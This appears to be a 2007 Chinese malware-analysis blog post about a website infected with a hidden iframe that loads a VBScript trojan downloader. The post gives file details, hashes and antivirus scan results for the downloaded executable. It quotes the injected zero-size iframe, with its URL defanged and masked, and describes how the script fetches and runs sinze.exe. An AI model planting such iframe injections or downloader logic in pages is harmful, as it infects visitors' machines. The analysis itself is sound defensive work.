endurer 原创
2007-01-15 第2版 补充Kaspersky的反应
2007-01-12 第1版
网站的网页被加入代码:
/------
<iframe src=hxxp://i***.the*c***.cn/sin**ze*/sin**ze*.htm width=0 height=0></iframe>
------/
sin**ze*.htm Kaspersky 报为 Trojan-Downloader.VBS.Psyme.ei。
在浏览器中打开该网页,会看到信息:
/------
就不让你看!气死你 by ******!
------/
其中******处的字符串可能是作者昵称,这里偶匿了。
还没完,网页中接下来有利用Replace()来保护自身的VBScript脚本,会利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 sinze.exe,保存为 %temp%/g0ld.com,并利用Shell.Application 对象Q 的 ShellExecute 方法 来运行。
sinze.exe 采用 ASPack 加壳
文件说明符 : D:/test/sinze.exe
获取文件版本信息大小失败!
创建时间 : 2007-1-12 16:21:11
修改时间 : 2007-1-12 16:21:13
访问时间 : 2007-1-12 16:28:57
大小 : 88708 字节 86.644 KB
MD5 : 118e7d74d99e10cef293b254e1dc78ff
Complete scanning result of "__25968", received in VirusTotal at 01.12.2007, 10:20:11 (CET).
Antivirus | Version | Update | Result |
AntiVir | 7.3.0.21 | 01.09.2007 | HEUR/Crypted |
Authentium | 4.93.8 | 01.12.2007 | could be a corrupted executable file |
Avast | 4.7.892.0 | 12.30.2006 | no virus found |
AVG | 386 | 01.11.2007 | no virus found |
BitDefender | 7.2 | 01.12.2007 | no virus found |
CAT-QuickHeal | 9.00 | 01.12.2007 | no virus found |
ClamAV | devel-20060426 | 01.12.2007 | no virus found |
DrWeb | 4.33 | 01.12.2007 | no virus found |
eSafe | 7.0.14.0 | 01.10.2007 | Suspicious Trojan/Worm |
eTrust-InoculateIT | 23.73.112 | 01.12.2007 | no virus found |
eTrust-Vet | 30.3.3319 | 01.11.2007 | no virus found |
Ewido | 4.0 | 01.11.2007 | no virus found |
Fortinet | 2.82.0.0 | 01.12.2007 | suspicious |
F-Prot | 3.16f | 01.11.2007 | no virus found |
F-Prot4 | 4.2.1.29 | 01.12.2007 | no virus found |
Ikarus | T3.1.0.27 | 01.09.2007 | no virus found |
Kaspersky | 4.0.2.24 | 01.12.2007 | no virus found |
McAfee | 4937 | 01.11.2007 | no virus found |
Microsoft | 1.1904 | 01.12.2007 | no virus found |
NOD32v2 | 1972 | 01.11.2007 | no virus found |
Norman | 5.80.02 | 01.11.2007 | no virus found |
Panda | 9.0.0.4 | 01.12.2007 | no virus found |
Prevx1 | V2 | 01.12.2007 | no virus found |
Sophos | 4.13.0 | 01.11.2007 | no virus found |
Sunbelt | 2.2.907.0 | 01.12.2007 | VIPRE.Suspicious |
TheHacker | 6.0.3.147 | 01.11.2007 | no virus found |
UNA | 1.83 | 01.11.2007 | no virus found |
VBA32 | 3.11.2 | 01.10.2007 | no virus found |
VirusBuster | 4.3.19:9 | 01.11.2007 | no virus found |
Aditional Information
File size: 88708 bytes
MD5: 118e7d74d99e10cef293b254e1dc78ff
SHA1: 7e562cfafef92b5f17d279beb2c968bd9e612817
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
今天重下载了这个文件:
文件说明符 : D:/test/sinze.exe
获取文件版本信息大小失败!
创建时间 : 2007-1-15 16:11:33
修改时间 : 2007-1-15 16:13:51
访问时间 : 2007-1-15 16:14:42
大小 : 425569 字节 415.609 KB
MD5 : 03111c59838bf6e6a16ad64413ed3954
下载过程中曾被KAV6拦截了一次,只得到了414,453字节。
Kaspersky报为:Virus.Win32.Delf.an